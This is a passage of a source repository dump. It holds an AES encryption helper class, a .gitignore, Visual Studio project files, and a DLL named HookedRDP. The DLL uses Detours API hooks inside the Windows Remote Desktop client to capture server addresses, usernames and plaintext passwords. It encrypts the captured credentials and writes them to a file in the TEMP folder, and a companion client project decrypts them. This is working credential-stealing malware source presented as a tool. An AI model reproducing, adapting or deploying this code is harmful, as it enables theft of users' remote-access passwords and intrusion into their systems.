STATUS_UNSUCCESSFUL; 29 | protected: 30 | DWORD cbKeyObject = 0; 31 | DWORD cbData = 0; 32 | DWORD cbBlockLen = 0; 33 | DWORD cbBlob = 0; 34 | DWORD cbPlainText = 0; 35 | DWORD cbCipherText = 0; 36 | 37 | PBYTE pbKeyObject = NULL; 38 | PBYTE pbIV = NULL; 39 | PBYTE pbBlob = NULL; 40 | PBYTE pbPlainText = NULL; 41 | PBYTE pbCipherText = NULL; 42 | 43 | std::string sCipherText; 44 | public: 45 | AES(){} 46 | ~AES() 47 | { 48 | if (hKey != NULL) 49 | { 50 | BCryptDestroyKey(hKey); 51 | } 52 | if (hAlgorithm != NULL) 53 | { 54 | BCryptCloseAlgorithmProvider(hAlgorithm, 0); 55 | } 56 | if (pbKeyObject != NULL) 57 | { 58 | delete[] pbKeyObject; 59 | } 60 | if (pbIV != NULL) 61 | { 62 | delete[] pbIV; 63 | } 64 | if (pbBlob != NULL) 65 | { 66 | delete[] pbBlob; 67 | } 68 | if (pbPlainText != NULL) 69 | { 70 | delete[] pbPlainText; 71 | } 72 | } 73 | 74 | BOOL initialize() 75 | { 76 | // Opens the algorithm handle 77 | status = BCryptOpenAlgorithmProvider(&hAlgorithm, BCRYPT_AES_ALGORITHM, NULL, 0); 78 | if (!NT_SUCCESS(status)) 79 | { 80 | return false; 81 | } 82 | 83 | // Calculates the size of the buffer to hold the KeyObject 84 | status = BCryptGetProperty(hAlgorithm, BCRYPT_OBJECT_LENGTH, reinterpret_cast(&cbKeyObject), sizeof(DWORD), &cbData, 0); 85 | if (!NT_SUCCESS(status)) 86 | { 87 | return false; 88 | } 89 | 90 | // Allocate the keyobject 91 | pbKeyObject = new BYTE[cbKeyObject]; 92 | 93 | // Get the block length for the IV 94 | status = BCryptGetProperty(hAlgorithm, BCRYPT_BLOCK_LENGTH, reinterpret_cast(&cbBlockLen), sizeof(DWORD), &cbData, 0); 95 | if (!NT_SUCCESS(status)) 96 | { 97 | return false; 98 | } 99 | 100 | // Determine whether the cbBlockLen is not longer than the IV length 101 | if (cbBlockLen > sizeof(rgbIV)) 102 | { 103 | status = STATUS_INVALID_BUFFER_SIZE; 104 | return false; 105 | } 106 | 107 | // Allocates the buffer for the IV. It is needed for the encrypt/decrypt process 108 | pbIV = new BYTE[cbBlockLen]; 109 | 110 | RtlCopyMemory(pbIV, rgbIV, cbBlockLen); 111 | 112 | status = BCryptSetProperty(hAlgorithm, BCRYPT_CHAINING_MODE, (PBYTE)BCRYPT_CHAIN_MODE_CBC, sizeof(BCRYPT_CHAIN_MODE_CBC), 0); 113 | if (!NT_SUCCESS(status)) 114 | { 115 | return false; 116 | } 117 | 118 | // Generate the key from supplied input key bytes 119 | status = BCryptGenerateSymmetricKey(hAlgorithm, &hKey, pbKeyObject, cbKeyObject, (PBYTE)rgbAES128Key, sizeof(rgbAES128Key), 0); 120 | if (!NT_SUCCESS(status)) 121 | { 122 | return false; 123 | } 124 | 125 | // Save the copy because its going to get nuked 126 | status = BCryptExportKey(hKey, NULL, BCRYPT_OPAQUE_KEY_BLOB, NULL, 0, &cbBlob, 0); 127 | if (!NT_SUCCESS(status)) 128 | { 129 | return false; 130 | } 131 | 132 | // Allocate the buffer to hold the blob 133 | pbBlob = new BYTE[cbBlob]; 134 | 135 | status = BCryptExportKey(hKey, NULL, BCRYPT_OPAQUE_KEY_BLOB, pbBlob, cbBlob, &cbBlob, 0); 136 | if (!NT_SUCCESS(status)) 137 | { 138 | return false; 139 | } 140 | return true; 141 | } 142 | 143 | BOOL CNGEncrypt(std::string EncryptMe) 144 | { 145 | cbPlainText = static_cast(EncryptMe.size()); 146 | pbPlainText = new BYTE[cbPlainText]; 147 | 148 | RtlCopyMemory(pbPlainText, EncryptMe.c_str(), EncryptMe.size()); 149 | 150 | // Get the output buffer size to encrypt 151 | status = BCryptEncrypt(hKey, pbPlainText, cbPlainText, NULL, pbIV, cbBlockLen, NULL, 0, &cbCipherText, BCRYPT_BLOCK_PADDING); 152 | if (!NT_SUCCESS(status)) 153 | { 154 | return false; 155 | } 156 | 157 | pbCipherText = new BYTE[cbCipherText]; 158 | status = BCryptEncrypt(hKey, pbPlainText, cbPlainText, NULL, pbIV, cbBlockLen, pbCipherText, cbCipherText, &cbData, BCRYPT_BLOCK_PADDING); 159 | if (!NT_SUCCESS(status)) 160 | { 161 | return false; 162 | } 163 | 164 | // Destroy the key 165 | status = BCryptDestroyKey(hKey); 166 | if (!NT_SUCCESS(status)) 167 | { 168 | return false; 169 | } 170 | 171 | hKey = NULL; 172 | return true; 173 | } 174 | 175 | BOOL CNGDecrypt() 176 | { 177 | if (pbPlainText) 178 | { 179 | delete[] pbPlainText; 180 | } 181 | 182 | ZeroMemory(pbKeyObject, cbKeyObject); 183 | 184 | RtlCopyMemory(pbIV, rgbIV, cbBlockLen); 185 | 186 | status = BCryptImportKey(hAlgorithm, NULL, BCRYPT_OPAQUE_KEY_BLOB, &hKey, pbKeyObject, cbKeyObject, pbBlob, cbBlob, 0); 187 | if (!NT_SUCCESS(status)) 188 | { 189 | return false; 190 | } 191 | 192 | // Get the output buffer size 193 | status = BCryptDecrypt(hKey, pbCipherText, cbCipherText, NULL, pbIV, cbBlockLen, NULL, 0, &cbPlainText, BCRYPT_BLOCK_PADDING); 194 | if (!NT_SUCCESS(status)) 195 | { 196 | return false; 197 | } 198 | 199 | pbPlainText = new BYTE[cbPlainText]; 200 | 201 | status = BCryptDecrypt(hKey, pbCipherText, cbCipherText, NULL, pbIV, cbBlockLen, pbPlainText, cbPlainText, &cbPlainText, BCRYPT_BLOCK_PADDING); 202 | if (!NT_SUCCESS(status)) 203 | { 204 | return false; 205 | } 206 | return true; 207 | } 208 | 209 | DWORD GetNTLastError() 210 | { 211 | return status; 212 | } 213 | 214 | PUCHAR GetEncryptedString() 215 | { 216 | return pbCipherText; 217 | } 218 | 219 | std::string GetEncodedString() 220 | { 221 | std::string result(reinterpret_cast(pbCipherText)); 222 | 223 | std::vector data(std::begin(result), std::end(result)); 224 | auto sCipherText = base64::encode(data); 225 | return sCipherText; 226 | } 227 | 228 | PUCHAR GetDecryptedString() 229 | { 230 | return pbPlainText; 231 | } 232 | }; 233 | 234 | -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | ## Ignore Visual Studio temporary files, build results, and 2 | ## files generated by popular Visual Studio add-ons. 3 | ## 4 | ## Get latest from https://github.com/github/gitignore/blob/master/VisualStudio.gitignore 5 | 6 | # User-specific files 7 | *.rsuser 8 | *.suo 9 | *.user 10 | *.userosscache 11 | *.sln.docstates 12 | 13 | # User-specific files (MonoDevelop/Xamarin Studio) 14 | *.userprefs 15 | 16 | # Build results 17 | [Dd]ebug/ 18 | [Dd]ebugPublic/ 19 | [Rr]elease/ 20 | [Rr]eleases/ 21 | x64/ 22 | x86/ 23 | [Aa][Rr][Mm]/ 24 | [Aa][Rr][Mm]64/ 25 | bld/ 26 | [Bb]in/ 27 | [Oo]bj/ 28 | [Ll]og/ 29 | 30 | # Visual Studio 2015/2017 cache/options directory 31 | .vs/ 32 | # Uncomment if you have tasks that create the project's static files in wwwroot 33 | #wwwroot/ 34 | 35 | # Visual Studio 2017 auto generated files 36 | Generated\ Files/ 37 | 38 | # MSTest test Results 39 | [Tt]est[Rr]esult*/ 40 | [Bb]uild[Ll]og.* 41 | 42 | # NUNIT 43 | *.VisualState.xml 44 | TestResult.xml 45 | 46 | # Build Results of an ATL Project 47 | [Dd]ebugPS/ 48 | [Rr]eleasePS/ 49 | dlldata.c 50 | 51 | # Benchmark Results 52 | BenchmarkDotNet.Artifacts/ 53 | 54 | # .NET Core 55 | project.lock.json 56 | project.fragment.lock.json 57 | artifacts/ 58 | 59 | # StyleCop 60 | StyleCopReport.xml 61 | 62 | # Files built by Visual Studio 63 | *_i.c 64 | *_p.c 65 | *_h.h 66 | *.ilk 67 | *.meta 68 | *.obj 69 | *.iobj 70 | *.pch 71 | *.pdb 72 | *.ipdb 73 | *.pgc 74 | *.pgd 75 | *.rsp 76 | *.sbr 77 | *.tlb 78 | *.tli 79 | *.tlh 80 | *.tmp 81 | *.tmp_proj 82 | *_wpftmp.csproj 83 | *.log 84 | *.vspscc 85 | *.vssscc 86 | .builds 87 | *.pidb 88 | *.svclog 89 | *.scc 90 | 91 | # Chutzpah Test files 92 | _Chutzpah* 93 | 94 | # Visual C++ cache files 95 | ipch/ 96 | *.aps 97 | *.ncb 98 | *.opendb 99 | *.opensdf 100 | *.sdf 101 | *.cachefile 102 | *.VC.db 103 | *.VC.VC.opendb 104 | 105 | # Visual Studio profiler 106 | *.psess 107 | *.vsp 108 | *.vspx 109 | *.sap 110 | 111 | # Visual Studio Trace Files 112 | *.e2e 113 | 114 | # TFS 2012 Local Workspace 115 | $tf/ 116 | 117 | # Guidance Automation Toolkit 118 | *.gpState 119 | 120 | # ReSharper is a .NET coding add-in 121 | _ReSharper*/ 122 | *.[Rr]e[Ss]harper 123 | *.DotSettings.user 124 | 125 | # JustCode is a .NET coding add-in 126 | .JustCode 127 | 128 | # TeamCity is a build add-in 129 | _TeamCity* 130 | 131 | # DotCover is a Code Coverage Tool 132 | *.dotCover 133 | 134 | # AxoCover is a Code Coverage Tool 135 | .axoCover/* 136 | !.axoCover/settings.json 137 | 138 | # Visual Studio code coverage results 139 | *.coverage 140 | *.coveragexml 141 | 142 | # NCrunch 143 | _NCrunch_* 144 | .*crunch*.local.xml 145 | nCrunchTemp_* 146 | 147 | # MightyMoose 148 | *.mm.* 149 | AutoTest.Net/ 150 | 151 | # Web workbench (sass) 152 | .sass-cache/ 153 | 154 | # Installshield output folder 155 | [Ee]xpress/ 156 | 157 | # DocProject is a documentation generator add-in 158 | DocProject/buildhelp/ 159 | DocProject/Help/*.HxT 160 | DocProject/Help/*.HxC 161 | DocProject/Help/*.hhc 162 | DocProject/Help/*.hhk 163 | DocProject/Help/*.hhp 164 | DocProject/Help/Html2 165 | DocProject/Help/html 166 | 167 | # Click-Once directory 168 | publish/ 169 | 170 | # Publish Web Output 171 | *.[Pp]ublish.xml 172 | *.azurePubxml 173 | # Note: Comment the next line if you want to checkin your web deploy settings, 174 | # but database connection strings (with potential passwords) will be unencrypted 175 | *.pubxml 176 | *.publishproj 177 | 178 | # Microsoft Azure Web App publish settings. Comment the next line if you want to 179 | # checkin your Azure Web App publish settings, but sensitive information contained 180 | # in these scripts will be unencrypted 181 | PublishScripts/ 182 | 183 | # NuGet Packages 184 | *.nupkg 185 | # The packages folder can be ignored because of Package Restore 186 | **/[Pp]ackages/* 187 | # except build/, which is used as an MSBuild target. 188 | !**/[Pp]ackages/build/ 189 | # Uncomment if necessary however generally it will be regenerated when needed 190 | #!**/[Pp]ackages/repositories.config 191 | # NuGet v3's project.json files produces more ignorable files 192 | *.nuget.props 193 | *.nuget.targets 194 | 195 | # Microsoft Azure Build Output 196 | csx/ 197 | *.build.csdef 198 | 199 | # Microsoft Azure Emulator 200 | ecf/ 201 | rcf/ 202 | 203 | # Windows Store app package directories and files 204 | AppPackages/ 205 | BundleArtifacts/ 206 | Package.StoreAssociation.xml 207 | _pkginfo.txt 208 | *.appx 209 | 210 | # Visual Studio cache files 211 | # files ending in .cache can be ignored 212 | *.[Cc]ache 213 | # but keep track of directories ending in .cache 214 | !?*.[Cc]ache/ 215 | 216 | # Others 217 | ClientBin/ 218 | ~$* 219 | *~ 220 | *.dbmdl 221 | *.dbproj.schemaview 222 | *.jfm 223 | *.pfx 224 | *.publishsettings 225 | orleans.codegen.cs 226 | 227 | # Including strong name files can present a security risk 228 | # (https://github.com/github/gitignore/pull/2483#issue-259490424) 229 | #*.snk 230 | 231 | # Since there are multiple workflows, uncomment next line to ignore bower_components 232 | # (https://github.com/github/gitignore/pull/1529#issuecomment-104372622) 233 | #bower_components/ 234 | 235 | # RIA/Silverlight projects 236 | Generated_Code/ 237 | 238 | # Backup & report files from converting an old project file 239 | # to a newer Visual Studio version. Backup files are not needed, 240 | # because we have git ;-) 241 | _UpgradeReport_Files/ 242 | Backup*/ 243 | UpgradeLog*.XML 244 | UpgradeLog*.htm 245 | ServiceFabricBackup/ 246 | *.rptproj.bak 247 | 248 | # SQL Server files 249 | *.mdf 250 | *.ldf 251 | *.ndf 252 | 253 | # Business Intelligence projects 254 | *.rdl.data 255 | *.bim.layout 256 | *.bim_*.settings 257 | *.rptproj.rsuser 258 | *- Backup*.rdl 259 | 260 | # Microsoft Fakes 261 | FakesAssemblies/ 262 | 263 | # GhostDoc plugin setting file 264 | *.GhostDoc.xml 265 | 266 | # Node.js Tools for Visual Studio 267 | .ntvs_analysis.dat 268 | node_modules/ 269 | 270 | # Visual Studio 6 build log 271 | *.plg 272 | 273 | # Visual Studio 6 workspace options file 274 | *.opt 275 | 276 | # Visual Studio 6 auto-generated workspace file (contains which files were open etc.) 277 | *.vbw 278 | 279 | # Visual Studio LightSwitch build output 280 | **/*.HTMLClient/GeneratedArtifacts 281 | **/*.DesktopClient/GeneratedArtifacts 282 | **/*.DesktopClient/ModelManifest.xml 283 | **/*.Server/GeneratedArtifacts 284 | **/*.Server/ModelManifest.xml 285 | _Pvt_Extensions 286 | 287 | # Paket dependency manager 288 | .paket/paket.exe 289 | paket-files/ 290 | 291 | # FAKE - F# Make 292 | .fake/ 293 | 294 | # JetBrains Rider 295 | .idea/ 296 | *.sln.iml 297 | 298 | # CodeRush personal settings 299 | .cr/personal 300 | 301 | # Python Tools for Visual Studio (PTVS) 302 | __pycache__/ 303 | *.pyc 304 | 305 | # Cake - Uncomment if you are using it 306 | # tools/** 307 | # !tools/packages.config 308 | 309 | # Tabs Studio 310 | *.tss 311 | 312 | # Telerik's JustMock configuration file 313 | *.jmconfig 314 | 315 | # BizTalk build output 316 | *.btp.cs 317 | *.btm.cs 318 | *.odx.cs 319 | *.xsd.cs 320 | 321 | # OpenCover UI analysis results 322 | OpenCover/ 323 | 324 | # Azure Stream Analytics local run output 325 | ASALocalRun/ 326 | 327 | # MSBuild Binary and Structured Log 328 | *.binlog 329 | 330 | # NVidia Nsight GPU debugger configuration file 331 | *.nvuser 332 | 333 | # MFractors (Xamarin productivity tool) working folder 334 | .mfractor/ 335 | 336 | # Local History for Visual Studio 337 | .localhistory/ 338 | 339 | # BeatPulse healthcheck temp database 340 | healthchecksdb -------------------------------------------------------------------------------- /DecryptClient/DecryptClient/DecryptClient.vcxproj: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Debug 6 | Win32 7 | 8 | 9 | Release 10 | Win32 11 | 12 | 13 | Debug 14 | x64 15 | 16 | 17 | Release 18 | x64 19 | 20 | 21 | 22 | 16.0 23 | {42F0BE83-04A5-4E65-A129-CD3AF3398644} 24 | Win32Proj 25 | DecryptClient 26 | 10.0 27 | 28 | 29 | 30 | Application 31 | true 32 | v142 33 | Unicode 34 | 35 | 36 | Application 37 | false 38 | v142 39 | true 40 | Unicode 41 | 42 | 43 | Application 44 | true 45 | v142 46 | Unicode 47 | 48 | 49 | Application 50 | false 51 | v142 52 | true 53 | Unicode 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | true 75 | 76 | 77 | true 78 | 79 | 80 | false 81 | 82 | 83 | false 84 | 85 | 86 | 87 | 88 | 89 | Level3 90 | true 91 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) 92 | true 93 | 94 | 95 | Console 96 | true 97 | 98 | 99 | 100 | 101 | 102 | 103 | Level3 104 | true 105 | _DEBUG;_CONSOLE;%(PreprocessorDefinitions) 106 | true 107 | 108 | 109 | Console 110 | true 111 | 112 | 113 | 114 | 115 | 116 | 117 | Level3 118 | true 119 | true 120 | true 121 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 122 | true 123 | 124 | 125 | Console 126 | true 127 | true 128 | true 129 | 130 | 131 | 132 | 133 | 134 | 135 | Level3 136 | true 137 | true 138 | true 139 | NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 140 | true 141 | 142 | 143 | Console 144 | true 145 | true 146 | true 147 | 148 | 149 | 150 | 151 | 152 | 153 | 154 | 155 | 156 | 157 | 158 | 159 | 160 | -------------------------------------------------------------------------------- /HookedRDP/dllmain.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | 6 | #include "HookedHelpers.h" 7 | #include "Base64.h" 8 | #include "AES.h" 9 | 10 | #ifdef _WIN64 11 | #include "Detours_x64/detours.h" 12 | #pragma comment(lib, "Detours_x64/detours.lib") 13 | #else 14 | #include "Detours_x86/detours.h" 15 | #pragma comment(lib, "Detours_x86/detours.lib") 16 | #endif 17 | 18 | #pragma comment(lib, "Secur32.lib") 19 | #pragma comment(lib, "crypt32.lib") 20 | 21 | std::string ConvertToString(const std::wstring& DLLName) 22 | { 23 | int len = WideCharToMultiByte(CP_ACP, 0, DLLName.c_str(), static_cast(DLLName.size() + 1), 0, 0, 0, 0); 24 | std::string result(len, '\0'); 25 | 26 | WideCharToMultiByte(CP_ACP, 0, DLLName.c_str(), static_cast(DLLName.size() + 1), &result[0], len, 0, 0); 27 | return result; 28 | } 29 | 30 | BOOL WriteToFile(std::string L00T) 31 | { 32 | std::wstring FullPath(1024, '\0'); 33 | DWORD lpNumberOfBytesWritten = 0; 34 | 35 | DWORD dwRet = GetEnvironmentVariable(L"TEMP", &FullPath[0], 1024); 36 | FullPath.resize(dwRet); 37 | FullPath.append(L"\\whatever.txt"); 38 | 39 | HANDLE hFile = CreateFile(FullPath.c_str(), FILE_APPEND_DATA, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL); 40 | if (hFile == INVALID_HANDLE_VALUE) 41 | { 42 | return false; // hmmm..would this work in a dll? 43 | } 44 | 45 | // Throw a newline so nothing will be on the same line when it's written 46 | L00T.push_back('\n'); 47 | WriteFile(hFile, L00T.c_str(), static_cast(L00T.size()), &lpNumberOfBytesWritten, NULL); 48 | CloseHandle(hFile); 49 | return true; 50 | } 51 | 52 | __declspec(dllexport) BOOL WINAPI HookedCredRead(LPCWSTR TargetName, DWORD Type, DWORD Flags, PCREDENTIAL* Credential) 53 | { 54 | RemoteDesktop.lpServerAddress = TargetName; 55 | return True_CredRead(TargetName, Type, Flags, Credential); 56 | } 57 | 58 | __declspec(dllexport) SECURITY_STATUS WINAPI HookedSspiPrepareForCredRead(PSEC_WINNT_AUTH_IDENTITY_OPAQUE AuthIdentity, PCWSTR pszTargetName, PULONG pCredmanCredentialType, PCWSTR* ppszCredmanTargetName) 59 | { 60 | RemoteDesktop.lpServerAddress = pszTargetName; 61 | return True_SspiPrepareForCredRead(AuthIdentity, pszTargetName, pCredmanCredentialType, ppszCredmanTargetName); 62 | } 63 | 64 | __declspec(dllexport) BOOL WINAPI HookedCryptProtectMemory(LPVOID pDataIn, DWORD cbDataIn, DWORD dwFlags) 65 | { 66 | DWORD cbPass = 0; 67 | LPVOID lpPassword = NULL; 68 | 69 | int* ptr = (int*)pDataIn; 70 | LPVOID lpPasswordAddress = ptr + 1; 71 | memcpy(&cbPass, pDataIn, 4); 72 | 73 | if (cbPass > 2) 74 | { 75 | SIZE_T written = 0; 76 | lpPassword = VirtualAlloc(NULL, 1024, MEM_COMMIT, PAGE_READWRITE); 77 | WriteProcessMemory(GetCurrentProcess(), lpPassword, lpPasswordAddress, cbPass, &written); 78 | RemoteDesktop.lpPassword = static_cast(lpPassword); 79 | 80 | if (!RemoteDesktop.lpServerAddress.empty() && !RemoteDesktop.lpUsername.empty() && !RemoteDesktop.lpPassword.empty()) 81 | { 82 | AES *EncryptBuffer = new AES(); 83 | if (!EncryptBuffer->initialize()) 84 | { 85 | MessageBox(NULL, L"Failed at initializing AES!", L"AES Encryption", MB_OK); 86 | return True_CryptProtectMemory(pDataIn, cbDataIn, dwFlags); //?? 87 | } 88 | 89 | std::wstring lpBuffer = RemoteDesktop.lpServerAddress + L"::"; 90 | lpBuffer += RemoteDesktop.lpUsername + L"::"; 91 | lpBuffer += RemoteDesktop.lpPassword; 92 | 93 | std::string lpBuffer2 = ConvertToString(lpBuffer); 94 | EncryptBuffer->CNGEncrypt(lpBuffer2); 95 | 96 | // Convert the encrypted string to base64 for easier reading and whatever else 97 | MessageBoxA(NULL, EncryptBuffer->GetEncodedString().c_str(), "Encrypted String", MB_OK); 98 | WriteToFile(EncryptBuffer->GetEncodedString().c_str()); 99 | 100 | // Clean up the struct so it won't constantly send anything 101 | RemoteDesktop.lpServerAddress.clear(); 102 | RemoteDesktop.lpUsername.clear(); 103 | RemoteDesktop.lpPassword.clear(); 104 | } 105 | } 106 | return True_CryptProtectMemory(pDataIn, cbDataIn, dwFlags); 107 | } 108 | 109 | __declspec(dllexport) BOOL WINAPI HookedCredIsMarshaledCredential(LPCWSTR MarshaledCredential) 110 | { 111 | RemoteDesktop.lpUsername = MarshaledCredential; 112 | return True_CredIsMarshaledCredential(MarshaledCredential); 113 | } 114 | 115 | BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) 116 | { 117 | LONG status = 0; 118 | 119 | if (DetourIsHelperProcess()) 120 | { 121 | return TRUE; 122 | } 123 | 124 | switch (ul_reason_for_call) 125 | { 126 | case DLL_PROCESS_ATTACH: 127 | status = DetourTransactionBegin(); 128 | if (status == ERROR_INVALID_OPERATION) 129 | { 130 | MessageBox(NULL, L"Failed at DetourTransactionBegin!", NULL, MB_ICONERROR); 131 | return FALSE; 132 | } 133 | 134 | status = DetourUpdateThread(GetCurrentThread()); 135 | if (status != NO_ERROR) 136 | { 137 | MessageBox(NULL, L"Failed at DetourUpdateThread!", NULL, MB_ICONERROR); 138 | return FALSE; 139 | } 140 | 141 | if (IsWindows8OrGreater()) 142 | { 143 | status = DetourAttach(&(PVOID&)True_SspiPrepareForCredRead, HookedSspiPrepareForCredRead); 144 | if (status != NO_ERROR) 145 | { 146 | MessageBox(NULL, L"Failed at DetourAttach for SspiPrepareForCredRead!", NULL, MB_ICONERROR); 147 | return FALSE; 148 | } 149 | } 150 | else 151 | { 152 | status = DetourAttach(&(PVOID&)True_CredRead, HookedCredRead); 153 | if (status != NO_ERROR) 154 | { 155 | MessageBox(NULL, L"Failed at DetourAttach for CredRead!", NULL, MB_ICONERROR); 156 | return FALSE; 157 | } 158 | } 159 | 160 | status = DetourAttach(&(PVOID&)True_CryptProtectMemory, HookedCryptProtectMemory); 161 | if (status != NO_ERROR) 162 | { 163 | MessageBox(NULL, L"Failed at DetourAttach for CryptProtectMemory!", NULL, MB_ICONERROR); 164 | return FALSE; 165 | } 166 | 167 | status = DetourAttach(&(PVOID&)True_CredIsMarshaledCredential, HookedCredIsMarshaledCredential); 168 | if (status != NO_ERROR) 169 | { 170 | MessageBox(NULL, L"Failed at DetourAttach for CredIsMarshaledCredential!", NULL, MB_ICONERROR); 171 | return FALSE; 172 | } 173 | 174 | status = DetourTransactionCommit(); 175 | if (status != NO_ERROR) 176 | { 177 | MessageBox(NULL, L"Failed at DetourTransactionCommit!", NULL, MB_ICONERROR); 178 | return FALSE; 179 | } 180 | break; 181 | case DLL_PROCESS_DETACH: 182 | status = DetourTransactionBegin(); 183 | if (status == ERROR_INVALID_OPERATION) 184 | { 185 | MessageBox(NULL, L"Failed at DetourTransactionBegin!", NULL, MB_ICONERROR); 186 | return FALSE; 187 | } 188 | 189 | status = DetourUpdateThread(GetCurrentThread()); 190 | if (status != NO_ERROR) 191 | { 192 | MessageBox(NULL, L"Failed at DetourUpdateThread!", NULL, MB_ICONERROR); 193 | return FALSE; 194 | } 195 | 196 | if (IsWindows8OrGreater()) 197 | { 198 | status = DetourAttach(&(PVOID&)True_SspiPrepareForCredRead, HookedSspiPrepareForCredRead); 199 | if (status != NO_ERROR) 200 | { 201 | MessageBox(NULL, L"Failed at DetourAttach for SspiPrepareForCredRead!", NULL, MB_ICONERROR); 202 | return FALSE; 203 | } 204 | } 205 | else 206 | { 207 | status = DetourAttach(&(PVOID&)True_CredRead, HookedCredRead); 208 | if (status != NO_ERROR) 209 | { 210 | MessageBox(NULL, L"Failed at DetourAttach for CredRead!", NULL, MB_ICONERROR); 211 | return FALSE; 212 | } 213 | } 214 | 215 | status = DetourAttach(&(PVOID&)True_CryptProtectMemory, HookedCryptProtectMemory); 216 | if (status != NO_ERROR) 217 | { 218 | MessageBox(NULL, L"Failed at DetourAttach for CryptProtectMemory!", NULL, MB_ICONERROR); 219 | return FALSE; 220 | } 221 | 222 | status = DetourAttach(&(PVOID&)True_CredIsMarshaledCredential, HookedCredIsMarshaledCredential); 223 | if (status != NO_ERROR) 224 | { 225 | MessageBox(NULL, L"Failed at DetourAttach for CredIsMarshaledCredential!", NULL, MB_ICONERROR); 226 | return FALSE; 227 | } 228 | 229 | status = DetourTransactionCommit(); 230 | if (status != NO_ERROR) 231 | { 232 | MessageBox(NULL, L"Failed at DetourTransactionCommit!", NULL, MB_ICONERROR); 233 | return FALSE; 234 | } 235 | break; 236 | } 237 | return TRUE; 238 | } 239 | -------------------------------------------------------------------------------- /HookedRDP/HookedRDP.vcxproj: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Debug 6 | Win32 7 | 8 | 9 | Release 10 | Win32 11 | 12 | 13 | Debug 14 | x64 15 | 16 | 17 | Release 18 | x64 19 | 20 | 21 | 22 | 16.0 23 | {5551A396-06A3-4391-BFEC-A42F4560A322} 24 | Win32Proj 25 | HookedRDP 26 | 10.0 27 | 28 | 29 | 30 | DynamicLibrary 31 | true 32 | v142 33 | Unicode 34 | 35 | 36 | DynamicLibrary 37 | false 38 | v142 39 | true 40 | Unicode 41 | 42 | 43 | DynamicLibrary 44 | true 45 | v142 46 | Unicode 47 | 48 | 49 | DynamicLibrary 50 | false 51 | v142 52 | true 53 | Unicode 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | true 75 | 76 | 77 | true 78 | 79 | 80 | false 81 | 82 | 83 | false 84 | 85 | 86 | 87 | Use 88 | Level3 89 | true 90 | WIN32;_DEBUG;HOOKEDRDP_EXPORTS;_WINDOWS;_USRDLL;%(PreprocessorDefinitions) 91 | true 92 | pch.h 93 | 94 | 95 | Windows 96 | true 97 | false 98 | 99 | 100 | 101 | 102 | Use 103 | Level3 104 | true 105 | _DEBUG;HOOKEDRDP_EXPORTS;_WINDOWS;_USRDLL;%(PreprocessorDefinitions) 106 | true 107 | pch.h 108 | 109 | 110 | Windows 111 | true 112 | false 113 | 114 | 115 | 116 | 117 | NotUsing 118 | Level3 119 | true 120 | true 121 | true 122 | WIN32;NDEBUG;HOOKEDRDP_EXPORTS;_WINDOWS;_USRDLL;%(PreprocessorDefinitions) 123 | true 124 | pch.h 125 | 126 | 127 | Windows 128 | true 129 | true 130 | true 131 | false 132 | 133 | 134 | 135 | 136 | NotUsing 137 | Level3 138 | true 139 | true 140 | true 141 | NDEBUG;HOOKEDRDP_EXPORTS;_WINDOWS;_USRDLL;%(PreprocessorDefinitions) 142 | true 143 | pch.h 144 | 145 | 146 | Windows 147 | true 148 | true 149 | false 150 | false 151 | 152 | 153 | 154 | 155 | 156 | 157 | 158 | 159 | 160 | 161 | 162 | 163 | 164 | Create 165 | Create 166 | Create 167 | Create 168 | 169 | 170 | 171 | 172 | 173 | --------------------------------------------------------------------------------